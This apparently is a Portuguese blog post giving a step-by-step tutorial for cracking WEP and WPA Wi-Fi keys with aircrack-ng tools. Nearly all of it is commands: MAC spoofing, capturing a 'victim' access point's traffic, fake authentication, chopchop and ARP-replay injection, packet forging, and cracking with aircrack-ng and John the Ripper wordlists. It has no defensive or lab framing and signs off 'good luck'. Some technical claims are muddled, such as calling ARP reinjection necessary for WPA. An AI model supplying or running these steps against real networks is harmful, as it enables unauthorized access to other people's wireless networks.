WEP WPA

quebrando chave wep & wpa..

O Hardware utilizado foi adaptador wireless usb com chipset Realteck 8187b com driver nativo do kernel 2.6.28.7 + patch do Aircrack-ng… foi instalado o pacote iw e o john…

http://trac.aircrack-ng.org/svn/trunk/patches/

http://trac.aircrack-ng.org/svn/trunk/patches/rtl8187_hw_signal_backport_2.6.28.patch

depois do Hardware pronto… vamos colocar a mão na massa!!!

criando  dispositivo mon0.. para podemos ativar o modo monitoramento da placa de rede wlan0…
#airmon-ng

vamos parar o dispositivo mon0 para mudarmos o mac dele
#airmon-ng stop wlan0

para o dispositivo…
#ifconfig mon0 down

mudar o mac…
#macchanger –mac 00:11:22:33:44:55 mon0

ativar o dispositivo mon0 para modo monitor com o novo mac…
#airmon-ng start mon0

escolher o alvo.. para copiarmos o mac..(depois de encontrado parar o programa! ctrl+4)
#airodump-ng wlan0

capturar pacotes…e o -c e o canal da vitima…(quanto mais pacotes capturados mais chance de quebrar a chave)
#airodump-ng -c 10 -w capturalogos –bssid MA:Cd:aV:IT:IM:Aa wlan0

vamos forjar uma autenticacao ao ponto de acesso…
#aireplay-ng -1 30 -e ESSIDvitima -a MA:Cd:aV:IT:IM:Aa -h 00:11:22:33:44:55 mon0

vamos atacar o AP com o chopchop attack(colocar seu mac e dispositivo real)
#aireplay-ng -4 -e ESSIDvitma -a MA:Cd:aV:IT:IM:Aa -h Ma:cP:la:ca:Re:de wlan0

reinjecao de pacotes arp… exclusivamente necessario para quebrar WPA…
#aireplay-ng -3 -b MA:Cd:aV:IT:IM:Aa -h VI:TI:MA:CO:NE:TA wlan0

vamos criar um pacote arp-request
#packetforge-ng -0 -a Ma:cP:la:ca:Re:de -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0317-133726.xor -w arp-request

vamos atacar com o pacote arp-request
#aireplay-ng -2 -r arp-request wlan0

Descobrindo a WEP ou WPA…
#aircrack-ng -x -0 -n 64 -z -f 1 -e ESSIDvitima -b Ma:cP:la:ca:Re:de capturalogos-01.cap

Se For uma Chave WPA que e mais complexa de quebrar vamos juntar o ataque a um dicionario de senhas para tornar mais eficiente…
#aircrack-ng -e SSIDvitima -w wordlist.txt capturalogos-01.cap

Pare reforcar mais ainda o ataque podemos usar o Jonh com uma boa word list…
#john –wordlist=dict.txt –rules –stdout | aircrack-ng -e ESSIDvitima capturalogos-01.cap

boa sorte!!🙂

Bibliografia..🙂

http://www.aircrack-ng.org/doku.php?id=airodump-ng.pt-br

http://www.gdhpress.com.br/redes/leia/index.php?p=cap5-21

Logs android teste
logcat_cm

dmesg_cm

dmesg_aosp

logcat_aosp

Deixe uma resposta

Faça o login usando um destes métodos para comentar:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s